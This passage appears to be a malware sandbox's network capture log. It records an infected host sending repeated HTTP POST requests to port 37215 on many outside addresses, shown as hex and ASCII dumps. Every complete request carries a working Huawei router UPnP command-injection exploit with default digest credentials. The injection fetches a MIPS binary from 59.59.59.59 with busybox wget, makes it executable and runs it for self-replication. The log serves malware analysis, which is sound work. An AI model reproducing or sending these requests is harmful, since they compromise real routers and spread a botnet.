2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          197192.168.2.15507009.142.229.1837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.553456068 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          198192.168.2.1544242157.153.130.8237215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.553721905 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          199192.168.2.153585041.96.169.17537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.555092096 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          200192.168.2.154827241.30.99.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.555115938 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          201192.168.2.1554400197.250.186.7337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.555159092 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          202192.168.2.1548842157.111.18.11637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.555164099 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          203192.168.2.1546476197.254.131.13937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.555206060 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          204192.168.2.1553610197.133.211.2137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.555337906 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          205192.168.2.1544260197.141.148.10337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.555347919 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          206192.168.2.155803641.9.99.5837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.555381060 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          207192.168.2.153790441.110.209.8837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:55:45.555407047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
